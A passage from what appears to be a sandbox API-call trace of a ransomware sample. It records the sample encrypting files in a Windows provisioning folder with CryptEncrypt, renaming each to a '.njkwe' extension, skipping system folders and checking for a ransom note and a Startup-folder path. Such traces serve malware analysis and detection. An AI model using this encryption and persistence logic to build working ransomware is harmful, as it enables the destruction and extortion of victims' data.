Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.063] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\39__connections_cellular_velcom (belarus)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.064] GetTickCount () returned 0x115416a [0079.064] GetTickCount () returned 0x115416a [0079.064] GetTickCount () returned 0x115416a [0079.064] GetTickCount () returned 0x115416a [0079.064] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.064] GetProcessHeap () returned 0xbe0000 [0079.064] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.064] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.066] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.066] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.066] GetProcessHeap () returned 0xbe0000 [0079.066] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.066] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.066] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.066] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.066] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.066] CloseHandle (hObject=0x43c) returned 1 [0079.066] GetProcessHeap () returned 0xbe0000 [0079.066] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.066] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\39__connections_cellular_velcom (belarus)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\39__connections_cellular_velcom (belarus)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.067] GetProcessHeap () returned 0xbe0000 [0079.067] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.067] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900ca6de, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x900ca6de, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x900ca6de, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="3__CON~1.PRO")) returned 1 [0079.067] lstrcmpiW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.067] lstrcmpiW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.067] lstrcmpiW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.067] lstrcmpiW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.067] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml") returned 160 [0079.067] StrStrIW (lpFirst="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.067] lstrcmpW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.067] lstrcmpW (lpString1="3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.067] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\3__Connection", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.068] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\3__connections_cellular_wataniya (algeria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.068] GetTickCount () returned 0x115416a [0079.068] GetTickCount () returned 0x115416a [0079.068] GetTickCount () returned 0x115416a [0079.068] GetTickCount () returned 0x115416a [0079.068] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.068] GetProcessHeap () returned 0xbe0000 [0079.068] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.068] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0079.070] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.070] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0079.070] GetProcessHeap () returned 0xbe0000 [0079.070] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.070] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.070] CloseHandle (hObject=0x43c) returned 1 [0079.070] GetProcessHeap () returned 0xbe0000 [0079.070] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.070] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\3__connections_cellular_wataniya (algeria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\3__Connections_Cellular_Wataniya (Algeria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\3__connections_cellular_wataniya (algeria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.071] GetProcessHeap () returned 0xbe0000 [0079.071] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.071] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ea67ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ea67ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ea67ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", cAlternateFileName="400__C~1.PRO")) returned 1 [0079.071] lstrcmpiW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.071] lstrcmpiW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.071] lstrcmpiW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.071] lstrcmpiW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.071] lstrcmpiW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.071] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml") returned 169 [0079.071] StrStrIW (lpFirst="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.071] lstrcmpW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.071] lstrcmpW (lpString1="400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.071] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\400__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.072] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\400__connections_cellular_vodacom sa (south africa)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.072] GetTickCount () returned 0x115416a [0079.072] GetTickCount () returned 0x115416a [0079.072] GetTickCount () returned 0x115416a [0079.072] GetTickCount () returned 0x115416a [0079.072] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.072] GetProcessHeap () returned 0xbe0000 [0079.072] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.072] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.073] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.074] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.074] GetProcessHeap () returned 0xbe0000 [0079.074] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.074] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.075] CloseHandle (hObject=0x43c) returned 1 [0079.075] GetProcessHeap () returned 0xbe0000 [0079.075] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.075] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0079.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\400__connections_cellular_vodacom sa (south africa)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\400__Connections_Cellular_Vodacom SA (South Africa)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\400__connections_cellular_vodacom sa (south africa)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.075] GetProcessHeap () returned 0xbe0000 [0079.076] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.076] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ea67ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ea67ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ea67ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", cAlternateFileName="401__C~1.PRO")) returned 1 [0079.076] lstrcmpiW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.076] lstrcmpiW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.076] lstrcmpiW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.076] lstrcmpiW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.076] lstrcmpiW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.076] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml") returned 169 [0079.076] StrStrIW (lpFirst="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.076] lstrcmpW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.076] lstrcmpW (lpString1="401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.076] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\401__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.076] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\401__connections_cellular_vodacom sa (south africa)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.076] GetTickCount () returned 0x115417a [0079.076] GetTickCount () returned 0x115417a [0079.076] GetTickCount () returned 0x115417a [0079.076] GetTickCount () returned 0x115417a [0079.076] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.076] GetProcessHeap () returned 0xbe0000 [0079.076] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.077] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0079.078] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.078] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0079.078] GetProcessHeap () returned 0xbe0000 [0079.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.078] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.079] CloseHandle (hObject=0x43c) returned 1 [0079.079] GetProcessHeap () returned 0xbe0000 [0079.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.079] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0079.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\401__connections_cellular_vodacom sa (south africa)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\401__Connections_Cellular_Vodacom SA (South Africa)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\401__connections_cellular_vodacom sa (south africa)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.080] GetProcessHeap () returned 0xbe0000 [0079.080] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.080] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ea67ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ea67ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ea67ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="402__C~1.PRO")) returned 1 [0079.080] lstrcmpiW (lpString1="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.080] lstrcmpiW (lpString1="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.080] lstrcmpiW (lpString1="402__Connections_Cellular_Movistar 